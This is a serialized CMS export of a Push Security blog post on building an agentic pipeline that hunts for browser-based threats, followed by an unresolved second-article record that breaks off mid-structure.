down.",{"data":19235,"content":19236,"nodeType":905},{},[],{"data":19238,"content":19239,"nodeType":909},{},[19240],{"data":19241,"marks":19242,"value":19243,"nodeType":883},{},[],"The promise and the perils of threat hunting (and where agentic capabilities fit in)",{"data":19245,"content":19246,"nodeType":879},{},[19247],{"data":19248,"marks":19249,"value":19250,"nodeType":883},{},[],"Threat hunting — the practice of proactively searching for threats that haven’t been seen before — is one of the most effective practices in security and one of the least accessible.",{"data":19252,"content":19253,"nodeType":879},{},[19254,19257,19265],{"data":19255,"marks":19256,"value":3786,"nodeType":883},{},[],{"data":19258,"content":19260,"nodeType":940},{"uri":19259},"https:\u002F\u002Fwww.sans.org\u002Fwhite-papers\u002Fsans-2025-threat-hunting-survey-advancements-threat-hunting-amid-ai-cloud-challenges",[19261],{"data":19262,"marks":19263,"value":19264,"nodeType":883},{},[],"SANS 2025 Threat Hunting Survey",{"data":19266,"marks":19267,"value":19268,"nodeType":883},{},[]," found that 61% of organizations cite staffing shortages as the top barrier to running a hunting program. A single manual hunt takes 10 to 20 hours of sustained analyst focus — forming hypotheses about what an attacker might be doing, querying data sources sequentially, correlating results by hand, documenting findings. Many organizations hunt infrequently or not at all.",{"data":19270,"content":19271,"nodeType":879},{},[19272],{"data":19273,"marks":19274,"value":19275,"nodeType":883},{},[],"Threat hunting in the browser poses specific challenges: The stakes are high as AI-enabled attacks accelerate, and the availability of training and knowledge is low. ",{"data":19277,"content":19278,"nodeType":879},{},[19279],{"data":19280,"marks":19281,"value":19283,"nodeType":883},{},[19282],{"type":916},"AiTM phishing kits that manipulate DOM elements in real time, ClickFix variants that inject malicious payloads through clipboard manipulation, ConsentFix attacks that abuse OAuth consent flows, credential harvesting on pages that rotate infrastructure hourly — these techniques don't map cleanly onto the endpoint-focused threat models most SOC teams were built around, or the data sources they’re used to interrogating. ",{"data":19285,"content":19286,"nodeType":879},{},[19287],{"data":19288,"marks":19289,"value":19290,"nodeType":883},{},[],"Even well-staffed security organizations tend to have a blind spot in the browser layer because the expertise required to hunt there is specialized and the telemetry to support it hasn't historically been available.",{"data":19292,"content":19293,"nodeType":879},{},[19294],{"data":19295,"marks":19296,"value":19297,"nodeType":883},{},[],"Using AI agents to hunt for browser-based threats promises a net-new capability for smaller teams without dedicated threat hunting staff. For larger enterprises, the value of an agentic threat hunting capability lies in its ability to provide (or augment) expertise on emerging attack methods.",{"data":19299,"content":19300,"nodeType":879},{},[19301],{"data":19302,"marks":19303,"value":19304,"nodeType":883},{},[],"Most SOC teams have deep expertise at the endpoint, IdP, cloud, and network layers, built over years of working with those systems’ telemetry and workflows. But browser-based attacks operate in a different domain with different telemetry, different TTPs, and a different evasion model.",{"data":19306,"content":19307,"nodeType":879},{},[19308],{"data":19309,"marks":19310,"value":19311,"nodeType":883},{},[],"A capability like Push’s provides an answer to these three hurdles: providing expertise, without any additional burden on staff, and at a speed that matches the acceleration we’re currently witnessing in browser-based attack techniques.",{"data":19313,"content":19317,"nodeType":971},{"target":19314},{"sys":19315},{"id":19316,"type":976,"linkType":977},"1uw9eFMPDdrevj26fyix5f",[],{"data":19319,"content":19320,"nodeType":905},{},[],{"data":19322,"content":19323,"nodeType":909},{},[19324],{"data":19325,"marks":19326,"value":19327,"nodeType":883},{},[],"This isn’t chatbot log analysis",{"data":19329,"content":19330,"nodeType":879},{},[19331],{"data":19332,"marks":19333,"value":19334,"nodeType":883},{},[],"When you hear “AI-powered threat hunting,” you might imagine an AI copilot sitting on top of your SIEM, summarizing alerts and correlating log entries faster than a human analyst could. It’s a fair assumption because many products use this kind of implementation, and tools like those are useful.",{"data":19336,"content":19337,"nodeType":879},{},[19338],{"data":19339,"marks":19340,"value":19341,"nodeType":883},{},[],"That’s not what we built at Push.",{"data":19343,"content":19344,"nodeType":879},{},[19345,19349,19357],{"data":19346,"marks":19347,"value":19348,"nodeType":883},{},[],"If you’re not familiar with Push, it’s a browser security platform deployed as an extension that detects and stops advanced browser-based attacks while also providing visibility and control over shadow apps and identities, including AI usage. You can use the same telemetry Push provides for these use cases to ",{"data":19350,"content":19352,"nodeType":940},{"uri":19351},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fwhy-you-cant-control-ai-without-being-in-the-browser\u002F",[19353],{"data":19354,"marks":19355,"value":19356,"nodeType":883},{},[],"perform data loss and insider risk investigations",{"data":19358,"marks":19359,"value":19360,"nodeType":883},{},[],", too.",{"data":19362,"content":19363,"nodeType":879},{},[19364],{"data":19365,"marks":19366,"value":19367,"nodeType":883},{},[],"What we built is an agentic threat hunting and detection pipeline where AI agents collaborate with in-house threat researchers to continuously hunt for emerging browser-based attack techniques across our customer base, and then automatically write and deploy new detections.",{"data":19369,"content":19370,"nodeType":879},{},[19371],{"data":19372,"marks":19373,"value":19374,"nodeType":883},{},[],"Our pipeline differs from AI-enabled log analysis in three key ways:",{"data":19376,"content":19377,"nodeType":1036},{},[19378],{"data":19379,"marks":19380,"value":19381,"nodeType":883},{},[],"A new telemetry source is the foundation",{"data":19383,"content":19384,"nodeType":879},{},[19385],{"data":19386,"marks":19387,"value":19388,"nodeType":883},{},[],"First, the Push platform generates its own telemetry. The Push browser extension operates as a flight recorder, locally collecting browser session metadata that doesn’t exist anywhere else in the security stack — details like DOM structure, script execution contexts, redirect chains, credential entry behavior, OAuth consent flows, and network requests observed from inside the session. ",{"data":19390,"content":19391,"nodeType":879},{},[19392],{"data":19393,"marks":19394,"value":19395,"nodeType":883},{},[],"This metadata is stored locally and only queried during targeted threat hunts, preserving user and customer privacy.",{"data":19397,"content":19398,"nodeType":1036},{},[19399],{"data":19400,"marks":19401,"value":19402,"nodeType":883},{},[],"Proactive hunting, not just reactive triage",{"data":19404,"content":19405,"nodeType":879},{},[19406],{"data":19407,"marks":19408,"value":19409,"nodeType":883},{},[],"The pipeline also hunts proactively rather than triaging reactively, as with log analysis agents.",{"data":19411,"content":19412,"nodeType":879},{},[19413],{"data":19414,"marks":19415,"value":19416,"nodeType":883},{},[],"Push agents generate hypotheses, craft queries against the telemetry corpus, run them across millions of browsers, and triage the results — searching for techniques that haven't triggered any existing alert or rule. ",{"data":19418,"content":19419,"nodeType":879},{},[19420,19423,19431],{"data":19421,"marks":19422,"value":3786,"nodeType":883},{},[],{"data":19424,"content":19425,"nodeType":940},{"uri":7409},[19426],{"data":19427,"marks":19428,"value":19430,"nodeType":883},{},[19429],{"type":948},"InstallFix discovery",{"data":19432,"marks":19433,"value":19434,"nodeType":883},{},[]," described in the original agentic threat hunting article is the clearest example: The Push pipeline surfaced 12 meaningful results from trillions of browser events, and one of them was a novel attack technique. That's threat hunting at machine scale, not just alert triage.",{"data":19436,"content":19437,"nodeType":1036},{},[19438],{"data":19439,"marks":19440,"value":19441,"nodeType":883},{},[],"Not just analysis, but new detections, too",{"data":19443,"content":19444,"nodeType":879},{},[19445],{"data":19446,"marks":19447,"value":19448,"nodeType":883},{},[],"Finally, the output isn’t (only) a natural-language summary of what the agents found. It’s a production detection rule that ships to every Push customer and wires into real-time enforcement controls defined by Push admins. ",{"data":19450,"content":19451,"nodeType":879},{},[19452],{"data":19453,"marks":19454,"value":19455,"nodeType":883},{},[],"The pipeline's job isn’t to help you understand an alert faster. Rather, it’s producing detection rules that didn't exist before at a speed that enables those detections to address emerging attack techniques and organization-specific campaigns within minutes.",{"data":19457,"content":19458,"nodeType":905},{},[],{"data":19460,"content":19461,"nodeType":909},{},[19462],{"data":19463,"marks":19464,"value":19465,"nodeType":883},{},[],"Agentic threat hunting as core product infrastructure",{"data":19467,"content":19468,"nodeType":879},{},[19469],{"data":19470,"marks":19471,"value":19472,"nodeType":883},{},[],"The nice thing about commercially available AI models is that they’re really good at understanding web code. That arcane Javascript function you’d have to look up in the docs? They recognize it immediately. That makes them perfectly suited to provide domain knowledge that can be harnessed with the right security expertise.",{"data":19474,"content":19475,"nodeType":879},{},[19476],{"data":19477,"marks":19478,"value":19479,"nodeType":883},{},[],"Using commercial models in our agentic detection pipeline then becomes a force multiplier for our research team’s understanding of TTPs — not a security engine in and of itself.",{"data":19481,"content":19482,"nodeType":879},{},[19483],{"data":19484,"marks":19485,"value":19486,"nodeType":883},{},[],"The four core components of our agentic pipeline can’t be replaced by using the same models we do, because the value is not in the models, but in the product infrastructure, product telemetry, and research expertise those models capitalize on.",{"data":19488,"content":19492,"nodeType":971},{"target":19489},{"sys":19490},{"id":19491,"type":976,"linkType":977},"7oif7PEEC3UMoTqVfRz3ZJ",[],{"data":19494,"content":19495,"nodeType":1036},{},[19496],{"data":19497,"marks":19498,"value":19499,"nodeType":883},{},[],"Component 1: The flight recorder",{"data":19501,"content":19502,"nodeType":879},{},[19503],{"data":19504,"marks":19505,"value":19506,"nodeType":883},{},[],"We deploy as a browser extension — not a separate browser, a proxy or an endpoint agent — which means we sit inside the browser session itself, seeing what the user sees. ",{"data":19508,"content":19509,"nodeType":879},{},[19510],{"data":19511,"marks":19512,"value":19513,"nodeType":883},{},[],"A component of the extension acts as a flight recorder, collecting and locally storing browser-level metadata: DOM elements, tab context, script execution, network traffic, user actions, credential entry, and more. This body of structured browser event metadata is the searchable landscape for every hunt.",{"data":19515,"content":19516,"nodeType":879},{},[19517],{"data":19518,"marks":19519,"value":19520,"nodeType":883},{},[],"That's a data source most security teams have never had access to. You can't get it from an endpoint agent, a network proxy, or a cloud access log, because it doesn't exist outside the browser session. Turns out, it matters more than the model itself: When the model has this full browser context — the DOM, redirect chains, user behavior — it can reason about what happened. When it has to start guessing at those details, it starts hallucinating.",{"data":19522,"content":19526,"nodeType":971},{"target":19523},{"sys":19524},{"id":19525,"type":976,"linkType":977},"6qs9xZvmKlVXOLVhFfMVFx",[],{"data":19528,"content":19529,"nodeType":1036},{},[19530],{"data":19531,"marks":19532,"value":19533,"nodeType":883},{},[],"Component 2: The internal knowledge base",{"data":19535,"content":19536,"nodeType":879},{},[19537],{"data":19538,"marks":19539,"value":19540,"nodeType":883},{},[],"As we mentioned earlier, commercial LLMs understand web code exceedingly well. What they don’t know is which patterns in that code indicate a credential-harvesting AiTM kit versus a legitimate login page, or which redirect behavior signals an InstallFix lure versus a normal marketing funnel.",{"data":19542,"content":19543,"nodeType":879},{},[19544],{"data":19545,"marks":19546,"value":19547,"nodeType":883},{},[],"That distinction comes from our internal knowledge base — years of TTP analysis, curated libraries of traces from real phishing kits encountered in the wild, and hunt parameters refined through hundreds of investigations led by our experienced human research team. ",{"data":19549,"content":19550,"nodeType":879},{},[19551],{"data":19552,"marks":19553,"value":19554,"nodeType":883},{},[],"This knowledge base also reflects a deliberate architectural choice. ",{"data":19556,"content":19557,"nodeType":4197},{},[19558],{"data":19559,"content":19560,"nodeType":879},{},[19561,19565,19573,19577],{"data":19562,"marks":19563,"value":19564,"nodeType":883},{},[],"As our CPO Jacques Louw put it on ",{"data":19566,"content":19568,"nodeType":940},{"uri":19567},"https:\u002F\u002Frisky.biz\u002FRBNEWSSI128\u002F",[19569],{"data":19570,"marks":19571,"value":19572,"nodeType":883},{},[],"Risky Business",{"data":19574,"marks":19575,"value":19576,"nodeType":883},{},[],": ",{"data":19578,"marks":19579,"value":19581,"nodeType":883},{},[19580],{"type":891},"\"There's no list of bad domains anywhere in the product. It's a crutch — a false cheat code that stops you from doing the detection in the way that actually is resilient, because the next time you see it, it will be on a different domain.\"",{"data":19583,"content":19584,"nodeType":879},{},[19585],{"data":19586,"marks":19587,"value":19588,"nodeType":883},{},[],"Our knowledge base encodes behavioral patterns and TTP signatures instead, which means detections remain effective even as infrastructure rotates underneath them.",{"data":19590,"content":19591,"nodeType":879},{},[19592],{"data":19593,"marks":19594,"value":19595,"nodeType":883},{},[],"We've also learned that even high-quality security data isn’t AI-ready out of the box. Structuring data and knowledge for agent consumption requires dedicated engineering. ",{"data":19597,"content":19598,"nodeType":879},{},[19599],{"data":19600,"marks":19601,"value":19602,"nodeType":883},{},[],"Our researchers have spent that time identifying, naming, and documenting browser-based attack techniques and encoding that knowledge into a format that agents can operationalize and extend.",{"data":19604,"content":19605,"nodeType":1036},{},[19606],{"data":19607,"marks":19608,"value":19609,"nodeType":883},{},[],"Component 3: The thoughtfully organized agents",{"data":19611,"content":19612,"nodeType":879},{},[19613,19617,19622],{"data":19614,"marks":19615,"value":19616,"nodeType":883},{},[],"The engineering challenge isn't getting a model to analyze one browser event — it's keeping it reliable across thousands of events. If you fill a context window with too much data and the model loses the ability to discern signal from noise, you get something called ",{"data":19618,"marks":19619,"value":19621,"nodeType":883},{},[19620],{"type":916},"context rot",{"data":19623,"marks":19624,"value":19625,"nodeType":883},{},[],". That's been our primary engineering focus over the last quarter: not making agents objectively smarter, but keeping them focused to improve their outputs.",{"data":19627,"content":19628,"nodeType":879},{},[19629],{"data":19630,"marks":19631,"value":19632,"nodeType":883},{},[],"Our solution is hierarchy. A hunting agent oversees the overall hunt — it understands the query and knows what it's looking for. It dispatches an army of analysis agents, each picking up a single result trace, the term we use for a series of events in a session or tab context. ",{"data":19634,"content":19635,"nodeType":879},{},[19636],{"data":19637,"marks":19638,"value":19639,"nodeType":883},{},[],"But even a single trace can contain thousands of events, so each analysis agent breaks it down into blocks, analyzes and summarizes each one, looks for connections between them, and then bubbles up only the interesting signal. Layer by layer, the context narrows until what reaches the top is workable.",{"data":19641,"content":19642,"nodeType":879},{},[19643],{"data":19644,"marks":19645,"value":19646,"nodeType":883},{},[],"Different agents handle hypothesis generation, query crafting, triage, deep investigation, detection authoring, and meta-analysis for quality control. We back-test detections against real data before they ship. This segmentation and hierarchy took significant trial and error — you can swap out almost any individual model in the chain, but the hierarchy itself is the thing that ultimately makes it work.",{"data":19648,"content":19649,"nodeType":879},{},[19650],{"data":19651,"marks":19652,"value":19653,"nodeType":883},{},[],"The consensus coming out of RSAC this year reinforces this approach. The industry's focus has shifted from “which model is the best?” to “how do we build reliable systems around these models?” ",{"data":19655,"content":19659,"nodeType":971},{"target":19656},{"sys":19657},{"id":19658,"type":976,"linkType":977},"4cXhgVflbtxiKs604aemSt",[],{"data":19661,"content":19662,"nodeType":1036},{},[19663],{"data":19664,"marks":19665,"value":19666,"nodeType":883},{},[],"Component 4: The response engine",{"data":19668,"content":19669,"nodeType":879},{},[19670],{"data":19671,"marks":19672,"value":19673,"nodeType":883},{},[],"Finally, a hunt without a response you can operationalize is just a report. When our agents identify a new technique, the detection they write feeds directly into the same platform that enforces real-time controls in the browser: blocking credential entry on phishing pages, intercepting clipboard injection attacks, warning users during suspicious OAuth consent flows, etc.",{"data":19675,"content":19676,"nodeType":879},{},[19677],{"data":19678,"marks":19679,"value":19680,"nodeType":883},{},[],"Detection and response share the same infrastructure, which means a new technique can go seamlessly from hunt analysis to production enforcement.",{"data":19682,"content":19686,"nodeType":971},{"target":19683},{"sys":19684},{"id":19685,"type":976,"linkType":977},"vIrkHJ4ec1I41nXeRHfT2",[],{"data":19688,"content":19689,"nodeType":905},{},[],{"data":19691,"content":19692,"nodeType":909},{},[19693],{"data":19694,"marks":19695,"value":19696,"nodeType":883},{},[],"Learn more about Push and how we develop new detections",{"data":19698,"content":19699,"nodeType":879},{},[19700,19704,19711],{"data":19701,"marks":19702,"value":19703,"nodeType":883},{},[],"For a deeper look at how the pipeline works in practice, including a step-by-step walkthrough of how we discovered a novel InstallFix attack targeting NotebookLM users, the two-loop detection architecture that creates a compounding effect for customers, and the emerging best practices we've identified for using AI agents in security operations, check out our companion article: ",{"data":19705,"content":19706,"nodeType":940},{"uri":19200},[19707],{"data":19708,"marks":19709,"value":19710,"nodeType":883},{},[],"Can AI replace a threat researcher? What we learned building an agentic threat hunting pipeline at Push",{"data":19712,"marks":19713,"value":1350,"nodeType":883},{},[],{"data":19715,"content":19716,"nodeType":879},{},[19717,19721,19727],{"data":19718,"marks":19719,"value":19720,"nodeType":883},{},[],"If you'd like to see how our agentic detection capabilities apply to your environment, ",{"data":19722,"content":19723,"nodeType":940},{"uri":4772},[19724],{"data":19725,"marks":19726,"value":7109,"nodeType":883},{},[],{"data":19728,"marks":19729,"value":1350,"nodeType":883},{},[],"No, you can’t just vibecode an AI-driven threat hunting pipeline","Push uses commercial AI models to deliver agentic threat hunting. Can’t you just build something yourself with those same models? Well, no.","2026-06-02T00:00:00.000Z","why-you-cant-vibecode-an-ai-driven-threat-hunting-pipeline",{"items":19735},[19736,19738],{"sys":19737,"name":298},{"id":6696},{"sys":19739,"name":3273},{"id":3272},{"items":19741},[19742],{"fullName":4797,"firstName":4798,"jobTitle":4799,"profilePicture":19743},{"url":4801},{"__typename":1967,"sys":19745,"content":19746,"title":8053,"synopsis":12658,"hashTags":59,"publishedDate":8982,"slug":12645,"tagsCollection":20415,"authorsCollection":20421},{"id":12660},{"json":19747},{"data":19748,"content":19749,"nodeType":875},{},[19750,19756,19762,19786,19792,19797,19802,19812,19815,19822,19835,19841,19846,19852,19858,19863,19866,19873,19879,19884,19889,19895,19901,19916,19921,19924,19931,19946,19951,19957,19960,19967,19973,19979,19984,19989,20023,20029,20032,20039,20045,20051,20084,20090,20114,20120,20153,20159,20162,20169,20184,20190,20197,20210,20216,20231,20237,20240,20246,20252,20268,20271,20278,20293,20299,20409],{"data":19751,"content":19752,"nodeType":879},{},[19753],{"data":19754,"marks":19755,"value":8072,"nodeType":883},{},[],{"data":19757,"content":19758,"nodeType":879},{},[19759],{"data":19760,"marks":19761,"value":8079,"nodeType":883},{},[],{"data":19763,"content":19764,"nodeType":879},{},[19765,19768,19774,19777,19783],{"data":19766,"marks":19767,"value":8086,"nodeType":883},{},[],{"data":19769,"content":19770,"nodeType":940},{"uri":8089},[19771],{"data":19772,"marks":19773,"value":8094,"nodeType":883},{},[],{"data":19775,"marks":19776,"value":8098,"nodeType":883},{},[],{"data":19778,"content":19779,"nodeType":940},{"uri":8101},[19780],{"data":19781,"marks":19782,"value":8106,"nodeType":883},{},[],{"data":19784,"marks":19785,"value":8110,"nodeType":883},{},[],{"data":19787,"content":19788,"nodeType":879},{},[19789],{"data":19790,"marks":19791,"value":8117,"nodeType":883},{},[],{"data":19793,"content":19796,"nodeType":971},{"target":19794},{"sys":19795},{"id":8122,"type":976,"linkType":977},[],{"data":19798,"content":19801,"nodeType":971},{"target":19799},{"sys":19800},{"id":8128,"type":976,"linkType":977},[],{"data":19803,"content":19804,"nodeType":879},{},[19805,19809],{"data":19806,"marks":19807,"value":8137,"nodeType":883},{},[19808],{"type":916},{"data":19810,"marks":19811,"value":8141,"nodeType":883},{},[],{"data":19813,"content":19814,"nodeType":905},{},[],{"data":19816,"content":19817,"nodeType":909},{},[19818],{"data":19819,"marks":19820,"value":8152,"nodeType":883},{},[19821],{"type":916},{"data":19823,"content":19824,"nodeType":879},{},[19825,19828,19832],{"data":19826,"marks":19827,"value":8159,"nodeType":883},{},[],{"data":19829,"marks":19830,"value":8164,"nodeType":883},{},[19831],{"type":891},{"data":19833,"marks":19834,"value":8168,"nodeType":883},{},[],{"data":19836,"content":19837,"nodeType":879},{},[19838],{"data":19839,"marks":19840,"value":8175,"nodeType":883},{},[],{"data":19842,"content":19845,"nodeType":971},{"target":19843},{"sys":19844},{"id":8180,"type":976,"linkType":977},[],{"data":19847,"content":19848,"nodeType":879},{},[19849],{"data":19850,"marks":19851,"value":8188,"nodeType":883},{},[],{"data":19853,"content":19854,"nodeType":879},{},[19855],{"data":19856,"marks":19857,"value":8195,"nodeType":883},{},[],{"data":19859,"content":19862,"nodeType":971},{"target":19860},{"sys":19861},{"id":8200,"type":976,"linkType":977},[],{"data":19864,"content":19865,"nodeType":905},{},[],{"data":19867,"content":19868,"nodeType":909},{},[19869],{"data":19870,"marks":19871,"value":8212,"nodeType":883},{},[19872],{"type":916},{"data":19874,"content":19875,"nodeType":879},{},[19876],{"data":19877,"marks":19878,"value":8219,"nodeType":883},{},[],{"data":19880,"content":19883,"nodeType":971},{"target":19881},{"sys":19882},{"id":8224,"type":976,"linkType":977},[],{"data":19885,"content":19888,"nodeType":971},{"target":19886},{"sys":19887},{"id":8230,"type":976,"linkType":977},[],{"data":19890,"content":19891,"nodeType":879},{},[19892],{"data":19893,"marks":19894,"value":8238,"nodeType":883},{},[],{"data":19896,"content":19897,"nodeType":879},{},[19898],{"data":19899,"marks":19900,"value":8245,"nodeType":883},{},[],{"data":19902,"content":19903,"nodeType":879},{},[19904,19907,19913],{"data":19905,"marks":19906,"value":8252,"nodeType":883},{},[],{"data":19908,"content":19909,"nodeType":940},{"uri":8255},[19910],{"data":19911,"marks":19912,"value":8260,"nodeType":883},{},[],{"data":19914,"marks":19915,"value":1350,"nodeType":883},{},[],{"data":19917,"content":19920,"nodeType":971},{"target":19918},{"sys":19919},{"id":8268,"type":976,"linkType":977},[],{"data":19922,"content":19923,"nodeType":905},{},[],{"data":19925,"content":19926,"nodeType":909},{},[19927],{"data":19928,"marks":19929,"value":8280,"nodeType":883},{},[19930],{"type":916},{"data":19932,"content":19933,"nodeType":879},{},[19934,19937,19943],{"data":19935,"marks":19936,"value":8287,"nodeType":883},{},[],{"data":19938,"content":19939,"nodeType":940},{"uri":8089},[19940],{"data":19941,"marks":19942,"value":8294,"nodeType":883},{},[],{"data":19944,"marks":19945,"value":8298,"nodeType":883},{},[],{"data":19947,"content":19950,"nodeType":971},{"target":19948},{"sys":19949},{"id":8303,"type":976,"linkType":977},[],{"data":19952,"content":19953,"nodeType":879},{},[19954],{"data":19955,"marks":19956,"value":8311,"nodeType":883},{},[],{"data":19958,"content":19959,"nodeType":905},{},[],{"data":19961,"content":19962,"nodeType":909},{},[19963],{"data":19964,"marks":19965,"value":8322,"nodeType":883},{},[19966],{"type":916},{"data":19968,"content":19969,"nodeType":879},{},[19970],{"data":19971,"marks":19972,"value":8329,"nodeType":883},{},[],{"data":19974,"content":19975,"nodeType":879},{},[19976],{"data":19977,"marks":19978,"value":8336,"nodeType":883},{},[],{"data":19980,"content":19983,"nodeType":971},{"target":19981},{"sys":19982},{"id":8341,"type":976,"linkType":977},[],{"data":19985,"content":19988,"nodeType":971},{"target":19986},{"sys":19987},{"id":8347,"type":976,"linkType":977},[],{"data":19990,"content":19991,"nodeType":879},{},[19992,19995,20001,20004,20010,20013,20020],{"data":19993,"marks":19994,"value":8355,"nodeType":883},{},[],{"data":19996,"content":19997,"nodeType":940},{"uri":8358},[19998],{"data":19999,"marks":20000,"value":8363,"nodeType":883},{},[],{"data":20002,"marks":20003,"value":8367,"nodeType":883},{},[],{"data":20005,"content":20006,"nodeType":940},{"uri":8370},[20007],{"data":20008,"marks":20009,"value":8375,"nodeType":883},{},[],{"data":20011,"marks":20012,"value":3983,"nodeType":883},{},[],{"data":20014,"content":20015,"nodeType":940},{"uri":8381},[20016],{"data":20017,"marks":20018,"value":8387,"nodeType":883},{},[20019],{"type":948},{"data":20021,"marks":20022,"value":8391,"nodeType":883},{},[],{"data":20024,"content":20025,"nodeType":879},{},[20026],{"data":20027,"marks":20028,"value":8398,"nodeType":883},{},[],{"data":20030,"content":20031,"nodeType":905},{},[],{"data":20033,"content":20034,"nodeType":909},{},[20035],{"data":20036,"marks":20037,"value":8409,"nodeType":883},{},[20038],{"type":916},{"data":20040,"content":20041,"nodeType":879},{},[20042],{"data":20043,"marks":20044,"value":8416,"nodeType":883},{},[],{"data":20046,"content":20047,"nodeType":1036},{},[20048],{"data":20049,"marks":20050,"value":8423,"nodeType":883},{},[],{"data":20052,"content":20053,"nodeType":879},{},[20054,20057,20063,20066,20072,20075,20081],{"data":20055,"marks":20056,"value":8430,"nodeType":883},{},[],{"data":20058,"content":20059,"nodeType":940},{"uri":8433},[20060],{"data":20061,"marks":20062,"value":8438,"nodeType":883},{},[],{"data":20064,"marks":20065,"value":8442,"nodeType":883},{},[],{"data":20067,"content":20068,"nodeType":940},{"uri":8445},[20069],{"data":20070,"marks":20071,"value":8450,"nodeType":883},{},[],{"data":20073,"marks":20074,"value":8454,"nodeType":883},{},[],{"data":20076,"content":20077,"nodeType":940},{"uri":8457},[20078],{"data":20079,"marks":20080,"value":8462,"nodeType":883},{},[],{"data":20082,"marks":20083,"value":8466,"nodeType":883},{},[],{"data":20085,"content":20086,"nodeType":1036},{},[20087],{"data":20088,"marks":20089,"value":8473,"nodeType":883},{},[],{"data":20091,"content":20092,"nodeType":879},{},[20093,20096,20102,20105,20111],{"data":20094,"marks":20095,"value":8480,"nodeType":883},{},[],{"data":20097,"content":20098,"nodeType":940},{"uri":8483},[20099],{"data":20100,"marks":20101,"value":8488,"nodeType":883},{},[],{"data":20103,"marks":20104,"value":8492,"nodeType":883},{},[],{"data":20106,"content":20107,"nodeType":940},{"uri":8495},[20108],{"data":20109,"marks":20110,"value":8500,"nodeType":883},{},[],{"data":20112,"marks":20113,"value":8504,"nodeType":883},{},[],{"data":20115,"content":20116,"nodeType":1036},{},[20117],{"data":20118,"marks":20119,"value":8511,"nodeType":883},{},[],{"data":20121,"content":20122,"nodeType":879},{},[20123,20126,20132,20135,20141,20144,20150],{"data":20124,"marks":20125,"value":8518,"nodeType":883},{},[],{"data":20127,"content":20128,"nodeType":940},{"uri":8521},[20129],{"data":20130,"marks":20131,"value":8526,"nodeType":883},{},[],{"data":20133,"marks":20134,"value":8530,"nodeType":883},{},[],{"data":20136,"content":20137,"nodeType":940},{"uri":8533},[20138],{"data":20139,"marks":20140,"value":8538,"nodeType":883},{},[],{"data":20142,"marks":20143,"value":8542,"nodeType":883},{},[],{"data":20145,"content":20146,"nodeType":940},{"uri":8545},[20147],{"data":20148,"marks":20149,"value":8550,"nodeType":883},{},[],{"data":20151,"marks":20152,"value":8554,"nodeType":883},{},[],{"data":20154,"content":20155,"nodeType":879},{},[20156],{"data":20157,"marks":20158,"value":8561,"nodeType":883},{},[],{"data":20160,"content":20161,"nodeType":905},{},[],{"data":20163,"content":20164,"nodeType":909},{},[20165],{"data":20166,"marks":20167,"value":8572,"nodeType":883},{},[20168],{"type":916},{"data":20170,"content":20171,"nodeType":879},{},[20172,20175,20181],{"data":20173,"marks":20174,"value":8579,"nodeType":883},{},[],{"data":20176,"content":20177,"nodeType":940},{"uri":8582},[20178],{"data":20179,"marks":20180,"value":8587,"nodeType":883},{},[],{"data":20182,"marks":20183,"value":8591,"nodeType":883},{},[],{"data":20185,"content":20186,"nodeType":879},{},[20187],{"data":20188,"marks":20189,"value":8598,"nodeType":883},{},[],{"data":20191,"content":20192,"nodeType":1036},{},[20193],{"data":20194,"marks":20195,"value":8606,"nodeType":883},{},[20196],{"type":916},{"data":20198,"content":20199,"nodeType":879},{},[20200,20203,20207],{"data":20201,"marks":20202,"value":8613,"nodeType":883},{},[],{"data":20204,"marks":20205,"value":1838,"nodeType":883},{},[20206],{"type":916},{"data":20208,"marks":20209,"value":8621,"nodeType":883},{},[],{"data":20211,"content":20212,"nodeType":879},{},[20213],{"data":20214,"marks":20215,"value":8628,"nodeType":883},{},[],{"data":20217,"content":20218,"nodeType":879},{},[20219,20222,20228],{"data":20220,"marks":20221,"value":8635,"nodeType":883},{},[],{"data":20223,"content":20224,"nodeType":940},{"uri":8638},[20225],{"data":20226,"marks":20227,"value":8643,"nodeType":883},{},[],{"data":20229,"marks":20230,"value":8647,"nodeType":883},{},[],{"data":20232,"content":20233,"nodeType":879},{},[20234],{"data":20235,"marks":20236,"value":8654,"nodeType":883},{},[],{"data":20238,"content":20239,"nodeType":905},{},[],{"data":20241,"content":20242,"nodeType":879},{},[20243],{"data":20244,"marks":20245,"value":1729,"nodeType":883},{},[],{"data":20247,"content":20248,"nodeType":879},{},[20249],{"data":20250,"marks":20251,"value":1736,"nodeType":883},{},[],{"data":20253,"content":20254,"nodeType":879},{},[20255,20258,20265],{"data":20256,"marks":20257,"value":21,"nodeType":883},{},[],{"data":20259,"content":20260,"nodeType":940},{"uri":3254},[20261],{"data":20262,"marks":20263,"value":3260,"nodeType":883},{},[20264],{"type":948},{"data":20266,"marks":20267,"value":21,"nodeType":883},{},[],{"data":20269,"content":20270,"nodeType":905},{},[],{"data":20272,"content":20273,"nodeType":909},{},[20274],{"data":20275,"marks":20276,"value":8696,"nodeType":883},{},[20277],{"type":916},{"data":20279,"content":20280,"nodeType":879},{},[20281,20284,20290],{"data":20282,"marks":20283,"value":8703,"nodeType":883},{},[],{"data":20285,"content":20286,"nodeType":940},{"uri":8706},[20287],{"data":20288,"marks":20289,"value":8711,"nodeType":883},{},[],{"data":20291,"marks":20292,"value":8715,"nodeType":883},{},[],{"data":20294,"content":20295,"nodeType":879},{},[20296],{"data":20297,"marks":20298,"value":8722,"nodeType":883},{},[],{"data":20300,"content":20301,"nodeType":8845},{},[20302,20325,20346,20367,20388],{"data":20303,"content":20304,"nodeType":8752},{},[20305,20315],{"data":20306,"content":20307,"nodeType":8740},{},[20308],{"data":20309,"content":20310,"nodeType":879},{},[20311],{"data":20312,"marks":20313,"value":8739,"nodeType":883},{},[20314],{"type":916},{"data":20316,"content":20317,"nodeType":8740},{},[20318],{"data":20319,"content":20320,"nodeType":879},{},[20321],{"data":20322,"marks":20323,"value":8751,"nodeType":883},{},[20324],{"type":916},{"data":20326,"content":20327,"nodeType":8752},{},[20328,20337],{"data":20329,"content":20330,"nodeType":8766},{},[20331],{"data":20332,"content":20333,"nodeType":879},{},[20334],{"data":20335,"marks":20336,"value":8765,"nodeType":883},{},[],{"data":20338,"content":20339,"nodeType":8766},{},[20340],{"data":20341,"content":20342,"nodeType":879},{},[20343],{"data":20344,"marks":20345,"value":8776,"nodeType":883},{},[],{"data":20347,"content":20348,"nodeType":8752},{},[20349,20358],{"data":20350,"content":20351,"nodeType":8766},{},[20352],{"data":20353,"content":20354,"nodeType":879},{},[20355],{"data":20356,"marks":20357,"value":8789,"nodeType":883},{},[],{"data":20359,"content":20360,"nodeType":8766},{},[20361],{"data":20362,"content":20363,"nodeType":879},{},[20364],{"data":20365,